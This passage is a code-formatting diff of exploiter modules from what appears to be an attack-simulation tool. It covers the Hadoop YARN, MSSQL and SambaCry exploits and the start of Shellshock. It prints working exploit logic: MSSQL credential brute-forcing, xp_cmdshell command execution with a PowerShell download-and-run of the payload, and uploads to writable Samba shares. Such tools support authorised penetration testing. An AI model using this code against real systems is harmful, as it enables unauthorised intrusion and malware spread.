timeout=LONG_REQUEST_TIMEOUT + ) resp = json.loads(resp.content) - app_id = resp['application-id'] + app_id = resp["application-id"] # Create a random name for our application in YARN - rand_name = ID_STRING + "".join([random.choice(string.ascii_lowercase) for _ in range(self.RAN_STR_LEN)]) + rand_name = ID_STRING + "".join( + [random.choice(string.ascii_lowercase) for _ in range(self.RAN_STR_LEN)] + ) payload = self.build_payload(app_id, rand_name, command) - resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT) + resp = requests.post( + posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT + ) return resp.status_code == 202 def check_if_exploitable(self, url): try: - resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"), - timeout=LONG_REQUEST_TIMEOUT) + resp = requests.post( + posixpath.join(url, "ws/v1/cluster/apps/new-application"), + timeout=LONG_REQUEST_TIMEOUT, + ) except requests.ConnectionError: return False return resp.status_code == 200 def build_command(self, path, http_path): # Build command to execute - monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, - vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]) - if 'linux' in self.host.os['type']: + monkey_cmd = build_monkey_commandline( + self.host, get_monkey_depth() - 1, vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0] + ) + if "linux" in self.host.os["type"]: base_command = HADOOP_LINUX_COMMAND else: base_command = HADOOP_WINDOWS_COMMAND - return base_command % {"monkey_path": path, "http_path": http_path, - "monkey_type": MONKEY_ARG, "parameters": monkey_cmd} + return base_command % { + "monkey_path": path, + "http_path": http_path, + "monkey_type": MONKEY_ARG, + "parameters": monkey_cmd, + } @staticmethod def build_payload(app_id, name, command): @@ -97,6 +114,6 @@ class HadoopExploiter(WebRCE): "command": command, } }, - "application-type": "YARN" + "application-type": "YARN", } return payload diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index c51acc3b8..893ee8ca1 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -8,7 +8,11 @@ import pymssql from common.utils.exceptions import ExploitingVulnerableMachineError, FailedExploitationError from common.utils.exploit_enum import ExploitType from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_monkey_dest_path +from infection_monkey.exploit.tools.helpers import ( + build_monkey_commandline, + get_monkey_depth, + get_monkey_dest_path, +) from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload from infection_monkey.model import DROPPER_ARG @@ -17,33 +21,37 @@ LOG = logging.getLogger(__name__) class MSSQLExploiter(HostExploiter): - _EXPLOITED_SERVICE = 'MSSQL' - _TARGET_OS_TYPE = ['windows'] + _EXPLOITED_SERVICE = "MSSQL" + _TARGET_OS_TYPE = ["windows"] EXPLOIT_TYPE = ExploitType.BRUTE_FORCE LOGIN_TIMEOUT = 15 # Time in seconds to wait between MSSQL queries. QUERY_BUFFER = 0.5 - SQL_DEFAULT_TCP_PORT = '1433' + SQL_DEFAULT_TCP_PORT = "1433" # Temporary file that saves commands for monkey's download and execution. - TMP_FILE_NAME = 'tmp_monkey.bat' + TMP_FILE_NAME = "tmp_monkey.bat" TMP_DIR_PATH = "%temp%\\tmp_monkey_dir" MAX_XP_CMDSHELL_COMMAND_SIZE = 128 - XP_CMDSHELL_COMMAND_START = "xp_cmdshell \"" - XP_CMDSHELL_COMMAND_END = "\"" + XP_CMDSHELL_COMMAND_START = 'xp_cmdshell "' + XP_CMDSHELL_COMMAND_END = '"' EXPLOIT_COMMAND_PREFIX = ">{payload_file_path}" CREATE_COMMAND_SUFFIX = ">{payload_file_path}" - MONKEY_DOWNLOAD_COMMAND = "powershell (new-object System.Net.WebClient)." \ - "DownloadFile(^\'{http_path}^\' , ^\'{dst_path}^\')" + MONKEY_DOWNLOAD_COMMAND = ( + "powershell (new-object System.Net.WebClient)." + "DownloadFile(^'{http_path}^' , ^'{dst_path}^')" + ) def __init__(self, host): super(MSSQLExploiter, self).__init__(host) self.cursor = None self.monkey_server = None - self.payload_file_path = os.path.join(MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME) + self.payload_file_path = os.path.join( + MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME + ) def _exploit_host(self): """ @@ -52,7 +60,9 @@ class MSSQLExploiter(HostExploiter): """ # Brute force to get connection username_passwords_pairs_list = self._config.get_exploit_user_password_pairs() - self.cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list) + self.cursor = self.brute_force( + self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list + ) # Create dir for payload self.create_temp_dir() @@ -80,11 +90,15 @@ class MSSQLExploiter(HostExploiter): return self.run_mssql_command(file_running_command) def create_temp_dir(self): - dir_creation_command = MSSQLLimitedSizePayload(command="mkdir {}".format(MSSQLExploiter.TMP_DIR_PATH)) + dir_creation_command = MSSQLLimitedSizePayload( + command="mkdir {}".format(MSSQLExploiter.TMP_DIR_PATH) + ) self.run_mssql_command(dir_creation_command) def create_empty_payload_file(self): - suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path) + suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format( + payload_file_path=self.payload_file_path + ) tmp_file_creation_command = MSSQLLimitedSizePayload(command="NUL", suffix=suffix) self.run_mssql_command(tmp_file_creation_command) @@ -111,9 +125,13 @@ class MSSQLExploiter(HostExploiter): def remove_temp_dir(self): # Remove temporary dir we stored payload at - tmp_file_removal_command = MSSQLLimitedSizePayload(command="del {}".format(self.payload_file_path)) + tmp_file_removal_command = MSSQLLimitedSizePayload( + command="del {}".format(self.payload_file_path) + ) self.run_mssql_command(tmp_file_removal_command) - tmp_dir_removal_command = MSSQLLimitedSizePayload(command="rmdir {}".format(MSSQLExploiter.TMP_DIR_PATH)) + tmp_dir_removal_command = MSSQLLimitedSizePayload( + command="rmdir {}".format(MSSQLExploiter.TMP_DIR_PATH) + ) self.run_mssql_command(tmp_dir_removal_command) def start_monkey_server(self): @@ -131,25 +149,29 @@ class MSSQLExploiter(HostExploiter): def get_monkey_launch_command(self): dst_path = get_monkey_dest_path(self.monkey_server.http_path) # Form monkey's launch command - monkey_args = build_monkey_commandline(self.host, - get_monkey_depth() - 1, - MSSQLExploiter.SQL_DEFAULT_TCP_PORT, - dst_path) + monkey_args = build_monkey_commandline( + self.host, get_monkey_depth() - 1, MSSQLExploiter.SQL_DEFAULT_TCP_PORT, dst_path + ) suffix = ">>{}".format(self.payload_file_path) prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX - return MSSQLLimitedSizePayload(command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args), - prefix=prefix, - suffix=suffix) + return MSSQLLimitedSizePayload( + command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args), + prefix=prefix, + suffix=suffix, + ) def get_monkey_download_command(self): dst_path = get_monkey_dest_path(self.monkey_server.http_path) - monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND. \ - format(http_path=self.monkey_server.http_path, dst_path=dst_path) + monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format( + http_path=self.monkey_server.http_path, dst_path=dst_path + ) prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX - suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path) - return MSSQLLimitedSizePayload(command=monkey_download_command, - suffix=suffix, - prefix=prefix) + suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format( + payload_file_path=self.payload_file_path + ) + return MSSQLLimitedSizePayload( + command=monkey_download_command, suffix=suffix, prefix=prefix + ) def brute_force(self, host, port, users_passwords_pairs_list): """ @@ -170,10 +192,14 @@ class MSSQLExploiter(HostExploiter): try: # Core steps # Trying to connect - conn = pymssql.connect(host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT) + conn = pymssql.connect( + host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT + ) LOG.info( - 'Successfully connected to host: {0}, using user: {1}, password (SHA-512): {2}'.format( - host, user, self._config.hash_sensitive_data(password))) + "Successfully connected to host: {0}, using user: {1}, password (SHA-512): {2}".format( + host, user, self._config.hash_sensitive_data(password) + ) + ) self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT) self.report_login_attempt(True, user, password) cursor = conn.cursor() @@ -183,14 +209,20 @@ class MSSQLExploiter(HostExploiter): # Combo didn't work, hopping to the next one pass - LOG.warning('No user/password combo was able to connect to host: {0}:{1}, ' - 'aborting brute force'.format(host, port)) - raise FailedExploitationError("Bruteforce process failed on host: {0}".format(self.host.ip_addr)) + LOG.warning( + "No user/password combo was able to connect to host: {0}:{1}, " + "aborting brute force".format(host, port) + ) + raise FailedExploitationError( + "Bruteforce process failed on host: {0}".format(self.host.ip_addr) + ) class MSSQLLimitedSizePayload(LimitedSizePayload): def __init__(self, command, prefix="", suffix=""): - super(MSSQLLimitedSizePayload, self).__init__(command=command, - max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE, - prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START + prefix, - suffix=suffix + MSSQLExploiter.XP_CMDSHELL_COMMAND_END) + super(MSSQLLimitedSizePayload, self).__init__( + command=command, + max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE, + prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START + prefix, + suffix=suffix + MSSQLExploiter.XP_CMDSHELL_COMMAND_END, + ) diff --git a/monkey/infection_monkey/exploit/sambacry.py b/monkey/infection_monkey/exploit/sambacry.py index 797ff6633..b0387105e 100644 --- a/monkey/infection_monkey/exploit/sambacry.py +++ b/monkey/infection_monkey/exploit/sambacry.py @@ -8,24 +8,46 @@ from io import BytesIO import impacket.smbconnection from impacket.nmb import NetBIOSError from impacket.nt_errors import STATUS_SUCCESS -from impacket.smb import (FILE_DIRECTORY_FILE, FILE_NON_DIRECTORY_FILE, FILE_OPEN, FILE_READ_DATA, FILE_SHARE_READ, - FILE_WRITE_DATA, SMB, SMB_DIALECT, SessionError, SMBCommand, SMBNtCreateAndX_Data, - SMBNtCreateAndX_Parameters) -from impacket.smb3structs import (SMB2_CREATE, SMB2_FLAGS_DFS_OPERATIONS, SMB2_IL_IMPERSONATION, SMB2_OPLOCK_LEVEL_NONE, - SMB2Create, SMB2Create_Response, SMB2Packet) +from impacket.smb import ( + FILE_DIRECTORY_FILE, + FILE_NON_DIRECTORY_FILE, + FILE_OPEN, + FILE_READ_DATA, + FILE_SHARE_READ, + FILE_WRITE_DATA, + SMB, + SMB_DIALECT, + SessionError, + SMBCommand, + SMBNtCreateAndX_Data, + SMBNtCreateAndX_Parameters, +) +from impacket.smb3structs import ( + SMB2_CREATE, + SMB2_FLAGS_DFS_OPERATIONS, + SMB2_IL_IMPERSONATION, + SMB2_OPLOCK_LEVEL_NONE, + SMB2Create, + SMB2Create_Response, + SMB2Packet, +) from impacket.smbconnection import SMBConnection import infection_monkey.monkeyfs as monkeyfs from common.utils.attack_utils import ScanStatus from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey_by_os +from infection_monkey.exploit.tools.helpers import ( + build_monkey_commandline, + get_monkey_depth, + get_target_monkey_by_os, +) from infection_monkey.model import DROPPER_ARG from infection_monkey.network.smbfinger import SMB_SERVICE from infection_monkey.network.tools import get_interface_to_target from infection_monkey.pyinstaller_utils import get_binary_file_path from infection_monkey.telemetry.attack.t1105_telem import T1105Telem -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" LOG = logging.getLogger(__name__) @@ -36,7 +58,7 @@ class SambaCryExploiter(HostExploiter): https://github.com/CoreSecurity/impacket/blob/master/examples/sambaPipe.py """ - _TARGET_OS_TYPE = ['linux'] + _TARGET_OS_TYPE = ["linux"] _EXPLOITED_SERVICE = "Samba" # Name of file which contains the monkey's commandline SAMBACRY_COMMANDLINE_FILENAME = "monkey_commandline.txt" @@ -65,8 +87,10 @@ class SambaCryExploiter(HostExploiter): return False writable_shares_creds_dict = self.get_writable_shares_creds_dict(self.host.ip_addr) - LOG.info("Writable shares and their credentials on host %s: %s" % - (self.host.ip_addr, str(writable_shares_creds_dict))) + LOG.info( + "Writable shares and their credentials on host %s: %s" + % (self.host.ip_addr, str(writable_shares_creds_dict)) + ) self.exploit_info["shares"] = {} for share in writable_shares_creds_dict: @@ -79,16 +103,25 @@ class SambaCryExploiter(HostExploiter): successfully_triggered_shares = [] for share in writable_shares_creds_dict: - trigger_result = self.get_trigger_result(self.host.ip_addr, share, writable_shares_creds_dict[share]) + trigger_result = self.get_trigger_result( + self.host.ip_addr, share, writable_shares_creds_dict[share] + ) creds = writable_shares_creds_dict[share] self.report_login_attempt( - trigger_result is not None, creds['username'], creds['password'], creds['lm_hash'], creds['ntlm_hash']) + trigger_result is not None, + creds["username"], + creds["password"], + creds["lm_hash"], + creds["ntlm_hash"], + ) if trigger_result is not None: successfully_triggered_shares.append((share, trigger_result)) - url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {'username': creds['username'], - 'host': self.host.ip_addr, - 'port': self.SAMBA_PORT, - 'share_name': share} + url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % { + "username": creds["username"], + "host": self.host.ip_addr, + "port": self.SAMBA_PORT, + "share_name": share, + } self.add_vuln_url(url) self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share]) @@ -97,8 +130,9 @@ class SambaCryExploiter(HostExploiter): if len(successfully_triggered_shares) > 0: LOG.info( - "Shares triggered successfully on host %s: %s" % ( - self.host.ip_addr, str(successfully_triggered_shares))) + "Shares triggered successfully on host %s: %s" + % (self.host.ip_addr, str(successfully_triggered_shares)) + ) self.add_vuln_port(self.SAMBA_PORT) return True else: @@ -117,8 +151,9 @@ class SambaCryExploiter(HostExploiter): self.trigger_module(smb_client, share) except (impacket.smbconnection.SessionError, SessionError): LOG.debug( - "Exception trying to exploit host: %s, share: %s, with creds: %s." % ( - self.host.ip_addr, share, str(creds))) + "Exception trying to exploit host: %s, share: %s, with creds: %s." + % (self.host.ip_addr, share, str(creds)) + ) def clean_share(self, ip, share, creds): """ @@ -129,9 +164,14 @@ class SambaCryExploiter(HostExploiter): """ smb_client = self.connect_to_server(ip, creds) tree_id = smb_client.connectTree(share) - file_list = [self.SAMBACRY_COMMANDLINE_FILENAME, self.SAMBACRY_RUNNER_RESULT_FILENAME, - self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64, - self.SAMBACRY_MONKEY_FILENAME_32, self.SAMBACRY_MONKEY_FILENAME_64] + file_list = [ + self.SAMBACRY_COMMANDLINE_FILENAME, + self.SAMBACRY_RUNNER_RESULT_FILENAME, + self.SAMBACRY_RUNNER_FILENAME_32, + self.SAMBACRY_RUNNER_FILENAME_64, + self.SAMBACRY_MONKEY_FILENAME_32, + self.SAMBACRY_MONKEY_FILENAME_64, + ] for filename in file_list: try: @@ -153,8 +193,9 @@ class SambaCryExploiter(HostExploiter): tree_id = smb_client.connectTree(share) file_content = None try: - file_id = smb_client.openFile(tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME, - desiredAccess=FILE_READ_DATA) + file_id = smb_client.openFile( + tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME, desiredAccess=FILE_READ_DATA + ) file_content = smb_client.readFile(tree_id, file_id) smb_client.closeFile(tree_id, file_id) except (impacket.smbconnection.SessionError, SessionError): @@ -193,16 +234,18 @@ class SambaCryExploiter(HostExploiter): def get_credentials_list(self): creds = self._config.get_exploit_user_password_or_hash_product() - creds = [{'username': user, 'password': password, 'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash} - for user, password, lm_hash, ntlm_hash in creds] + creds = [ + {"username": user, "password": password, "lm_hash": lm_hash, "ntlm_hash": ntlm_hash} + for user, password, lm_hash, ntlm_hash in creds + ] # Add empty credentials for anonymous shares. - creds.insert(0, {'username': '', 'password': '', 'lm_hash': '', 'ntlm_hash': ''}) + creds.insert(0, {"username": "", "password": "", "lm_hash": "", "ntlm_hash": ""}) return creds def list_shares(self, smb_client): - shares = [x['shi1_netname'][:-1] for x in smb_client.listShares()] + shares = [x["shi1_netname"][:-1] for x in smb_client.listShares()] return [x for x in shares if x not in self._config.sambacry_shares_not_to_check] def is_vulnerable(self): @@ -214,8 +257,8 @@ class SambaCryExploiter(HostExploiter): LOG.info("Host: %s doesn't have SMB open" % self.host.ip_addr) return False - pattern = re.compile(r'\d*\.\d*\.\d*') - smb_server_name = self.host.services[SMB_SERVICE].get('name') + pattern = re.compile(r"\d*\.\d*\.\d*") + smb_server_name = self.host.services[SMB_SERVICE].get("name") if not smb_server_name: LOG.info("Host: %s refused SMB connection" % self.host.ip_addr) return False @@ -223,27 +266,38 @@ class SambaCryExploiter(HostExploiter): pattern_result = pattern.search(smb_server_name) is_vulnerable = False if pattern_result is not None: - samba_version = smb_server_name[pattern_result.start():pattern_result.end()] - samba_version_parts = samba_version.split('.') + samba_version = smb_server_name[pattern_result.start() : pattern_result.end()] + samba_version_parts = samba_version.split(".") if (samba_version_parts[0] == "3") and (samba_version_parts[1] >= "5"): is_vulnerable = True elif (samba_version_parts[0] == "4") and (samba_version_parts[1] <= "3"): is_vulnerable = True - elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "4") and ( - samba_version_parts[1] <= "13"): + elif ( + (samba_version_parts[0] == "4") + and (samba_version_parts[1] == "4") + and (samba_version_parts[1] <= "13") + ): is_vulnerable = True - elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "5") and ( - samba_version_parts[1] <= "9"): + elif ( + (samba_version_parts[0] == "4") + and (samba_version_parts[1] == "5") + and (samba_version_parts[1] <= "9") + ): is_vulnerable = True - elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "6") and ( - samba_version_parts[1] <= "3"): + elif ( + (samba_version_parts[0] == "4") + and (samba_version_parts[1] == "6") + and (samba_version_parts[1] <= "3") + ): is_vulnerable = True else: # If pattern doesn't match we can't tell what version it is. Better try is_vulnerable = True - LOG.info("Host: %s.samba server name: %s. samba version: %s. is vulnerable: %s" % - (self.host.ip_addr, smb_server_name, samba_version, repr(is_vulnerable))) + LOG.info( + "Host: %s.samba server name: %s. samba version: %s. is vulnerable: %s" + % (self.host.ip_addr, smb_server_name, samba_version, repr(is_vulnerable)) + ) return is_vulnerable @@ -255,27 +309,41 @@ class SambaCryExploiter(HostExploiter): """ tree_id = smb_client.connectTree(share) - with self.get_monkey_commandline_file(self._config.dropper_target_path_linux) as monkey_commandline_file: - smb_client.putFile(share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read) + with self.get_monkey_commandline_file( + self._config.dropper_target_path_linux + ) as monkey_commandline_file: + smb_client.putFile( + share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read + ) with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file: - smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read) + smb_client.putFile( + share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read + ) with self.get_monkey_runner_bin_file(False) as monkey_runner_bin_file: - smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read) + smb_client.putFile( + share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read + ) monkey_bin_32_src_path = get_target_monkey_by_os(False, True) monkey_bin_64_src_path = get_target_monkey_by_os(False, False) with monkeyfs.open(monkey_bin_32_src_path, "rb") as monkey_bin_file: - smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read) + smb_client.putFile( + share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read + ) with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file: - smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read) - T1105Telem(ScanStatus.USED, - get_interface_to_target(self.host.ip_addr), - self.host.ip_addr, - monkey_bin_64_src_path).send() + smb_client.putFile( + share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read + ) + T1105Telem( + ScanStatus.USED, + get_interface_to_target(self.host.ip_addr), + self.host.ip_addr, + monkey_bin_64_src_path, + ).send() smb_client.disconnectTree(tree_id) def trigger_module(self, smb_client, share): @@ -305,7 +373,7 @@ class SambaCryExploiter(HostExploiter): self.open_pipe(smb_client, "/" + module_path) except Exception as e: # This is the expected result. We can't tell whether we succeeded or not just by this error code. - if str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0: + if str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0: return True else: pass @@ -320,7 +388,10 @@ class SambaCryExploiter(HostExploiter): """ sambacry_folder_paths_to_guess = self._config.sambacry_folder_paths_to_guess file_names = [self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64] - return [posixpath.join(*x) for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names)] + return [ + posixpath.join(*x) + for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names) + ] def get_monkey_runner_bin_file(self, is_32bit): if is_32bit: @@ -329,10 +400,12 @@ class SambaCryExploiter(HostExploiter): return open(get_binary_file_path(self.SAMBACRY_RUNNER_FILENAME_64), "rb") def get_monkey_commandline_file(self, location): - return BytesIO(DROPPER_ARG + build_monkey_commandline(self.host, - get_monkey_depth() - 1, - SambaCryExploiter.SAMBA_PORT, - str(location))) + return BytesIO( + DROPPER_ARG + + build_monkey_commandline( + self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT, str(location) + ) + ) @staticmethod def is_share_writable(smb_client, share): @@ -342,14 +415,14 @@ class SambaCryExploiter(HostExploiter): :param share: share name :return: True if share is writable, False otherwise. """ - LOG.debug('Checking %s for write access' % share) + LOG.debug("Checking %s for write access" % share) try: tree_id = smb_client.connectTree(share) except (impacket.smbconnection.SessionError, SessionError): return False try: - smb_client.openFile(tree_id, '\\', FILE_WRITE_DATA, creationOption=FILE_DIRECTORY_FILE) + smb_client.openFile(tree_id, "\\", FILE_WRITE_DATA, creationOption=FILE_DIRECTORY_FILE) writable = True except (impacket.smbconnection.SessionError, SessionError): writable = False @@ -369,85 +442,103 @@ class SambaCryExploiter(HostExploiter): """ smb_client = SMBConnection(ip, ip) smb_client.login( - credentials["username"], credentials["password"], '', credentials["lm_hash"], credentials["ntlm_hash"]) + credentials["username"], + credentials["password"], + "", + credentials["lm_hash"], + credentials["ntlm_hash"], + ) return smb_client # Following are slightly modified SMB functions from impacket to fit our needs of the vulnerability # @staticmethod - def create_smb(smb_client, treeId, fileName, desiredAccess, shareMode, creationOptions, creationDisposition, - fileAttributes, impersonationLevel=SMB2_IL_IMPERSONATION, securityFlags=0, - oplockLevel=SMB2_OPLOCK_LEVEL_NONE, createContexts=None): + def create_smb( + smb_client, + treeId, + fileName, + desiredAccess, + shareMode, + creationOptions, + creationDisposition, + fileAttributes, + impersonationLevel=SMB2_IL_IMPERSONATION, + securityFlags=0, + oplockLevel=SMB2_OPLOCK_LEVEL_NONE, + createContexts=None, + ): packet = smb_client.getSMBServer().SMB_PACKET() - packet['Command'] = SMB2_CREATE - packet['TreeID'] = treeId - if smb_client._SMBConnection._Session['TreeConnectTable'][treeId]['IsDfsShare'] is True: - packet['Flags'] = SMB2_FLAGS_DFS_OPERATIONS + packet["Command"] = SMB2_CREATE + packet["TreeID"] = treeId + if smb_client._SMBConnection._Session["TreeConnectTable"][treeId]["IsDfsShare"] is True: + packet["Flags"] = SMB2_FLAGS_DFS_OPERATIONS smb2Create = SMB2Create() - smb2Create['SecurityFlags'] = 0 - smb2Create['RequestedOplockLevel'] = oplockLevel - smb2Create['ImpersonationLevel'] = impersonationLevel - smb2Create['DesiredAccess'] = desiredAccess - smb2Create['FileAttributes'] = fileAttributes - smb2Create['ShareAccess'] = shareMode - smb2Create['CreateDisposition'] = creationDisposition - smb2Create['CreateOptions'] = creationOptions + smb2Create["SecurityFlags"] = 0 + smb2Create["RequestedOplockLevel"] = oplockLevel + smb2Create["ImpersonationLevel"] = impersonationLevel + smb2Create["DesiredAccess"] = desiredAccess + smb2Create["FileAttributes"] = fileAttributes + smb2Create["ShareAccess"] = shareMode + smb2Create["CreateDisposition"] = creationDisposition + smb2Create["CreateOptions"] = creationOptions - smb2Create['NameLength'] = len(fileName) * 2 - if fileName != '': - smb2Create['Buffer'] = fileName.encode('utf-16le') + smb2Create["NameLength"] = len(fileName) * 2 + if fileName != "": + smb2Create["Buffer"] = fileName.encode("utf-16le") else: - smb2Create['Buffer'] = b'\x00' + smb2Create["Buffer"] = b"\x00" if createContexts is not None: - smb2Create['Buffer'] += createContexts - smb2Create['CreateContextsOffset'] = len(SMB2Packet()) + SMB2Create.SIZE + smb2Create['NameLength'] - smb2Create['CreateContextsLength'] = len(createContexts) + smb2Create["Buffer"] += createContexts + smb2Create["CreateContextsOffset"] = ( + len(SMB2Packet()) + SMB2Create.SIZE + smb2Create["NameLength"] + ) + smb2Create["CreateContextsLength"] = len(createContexts) else: - smb2Create['CreateContextsOffset'] = 0 - smb2Create['CreateContextsLength'] = 0 + smb2Create["CreateContextsOffset"] = 0 + smb2Create["CreateContextsLength"] = 0 - packet['Data'] = smb2Create + packet["Data"] = smb2Create packetID = smb_client.getSMBServer().sendSMB(packet) ans = smb_client.getSMBServer().recvSMB(packetID) if ans.isValidAnswer(STATUS_SUCCESS): - createResponse = SMB2Create_Response(ans['Data']) + createResponse = SMB2Create_Response(ans["Data"]) # The client MUST generate a handle for the Open, and it MUST # return success and the generated handle to the calling application. # In our case, str(FileID) - return str(createResponse['FileID']) + return str(createResponse["FileID"]) @staticmethod def open_pipe(smb_client, pathName): # We need to overwrite Impacket's openFile functions since they automatically convert paths to NT style # to make things easier for the caller. Not this time ;) - treeId = smb_client.connectTree('IPC$') - LOG.debug('Triggering path: %s' % pathName) + treeId = smb_client.connectTree("IPC$") + LOG.debug("Triggering path: %s" % pathName) if smb_client.getDialect() == SMB_DIALECT: _, flags2 = smb_client.getSMBServer().get_flags() - pathName = pathName.encode('utf-16le') if flags2 & SMB.FLAGS2_UNICODE else pathName + pathName = pathName.encode("utf-16le") if flags2 & SMB.FLAGS2_UNICODE else pathName ntCreate = SMBCommand(SMB.SMB_COM_NT_CREATE_ANDX) - ntCreate['Parameters'] = SMBNtCreateAndX_Parameters() - ntCreate['Data'] = SMBNtCreateAndX_Data(flags=flags2) - ntCreate['Parameters']['FileNameLength'] = len(pathName) - ntCreate['Parameters']['AccessMask'] = FILE_READ_DATA - ntCreate['Parameters']['FileAttributes'] = 0 - ntCreate['Parameters']['ShareAccess'] = FILE_SHARE_READ - ntCreate['Parameters']['Disposition'] = FILE_NON_DIRECTORY_FILE - ntCreate['Parameters']['CreateOptions'] = FILE_OPEN - ntCreate['Parameters']['Impersonation'] = SMB2_IL_IMPERSONATION - ntCreate['Parameters']['SecurityFlags'] = 0 - ntCreate['Parameters']['CreateFlags'] = 0x16 - ntCreate['Data']['FileName'] = pathName + ntCreate["Parameters"] = SMBNtCreateAndX_Parameters() + ntCreate["Data"] = SMBNtCreateAndX_Data(flags=flags2) + ntCreate["Parameters"]["FileNameLength"] = len(pathName) + ntCreate["Parameters"]["AccessMask"] = FILE_READ_DATA + ntCreate["Parameters"]["FileAttributes"] = 0 + ntCreate["Parameters"]["ShareAccess"] = FILE_SHARE_READ + ntCreate["Parameters"]["Disposition"] = FILE_NON_DIRECTORY_FILE + ntCreate["Parameters"]["CreateOptions"] = FILE_OPEN + ntCreate["Parameters"]["Impersonation"] = SMB2_IL_IMPERSONATION + ntCreate["Parameters"]["SecurityFlags"] = 0 + ntCreate["Parameters"]["CreateFlags"] = 0x16 + ntCreate["Data"]["FileName"] = pathName if flags2 & SMB.FLAGS2_UNICODE: - ntCreate['Data']['Pad'] = 0x0 + ntCreate["Data"]["Pad"] = 0x0 return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate) else: @@ -459,4 +550,5 @@ class SambaCryExploiter(HostExploiter): shareMode=FILE_SHARE_READ, creationOptions=FILE_OPEN, creationDisposition=FILE_NON_DIRECTORY_FILE, - fileAttributes=0) + fileAttributes=0, + ) diff --git a/monkey/infection_monkey/exploit/shellshock.py b/monkey/infection_monkey/exploit/shellshock.py index 4caa7441f..11932c3f5 100644 --- a/monkey/infection_monkey/exploit/shellshock.py +++ b/monkey/infection_monkey/exploit/shellshock.py @@ -9,51 +9,58 @@ import requests from common.utils.attack_utils import ScanStatus from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.shellshock_resources import CGI_FILES -from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey +from infection_monkey.exploit.tools.helpers import ( + build_monkey_commandline, + get_monkey_depth, + get_target_monkey, +) from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.model import DROPPER_ARG from infection_monkey.telemetry.attack.t1222_telem import T1222Telem -__author__ = 'danielg' +__author__ = "danielg" LOG = 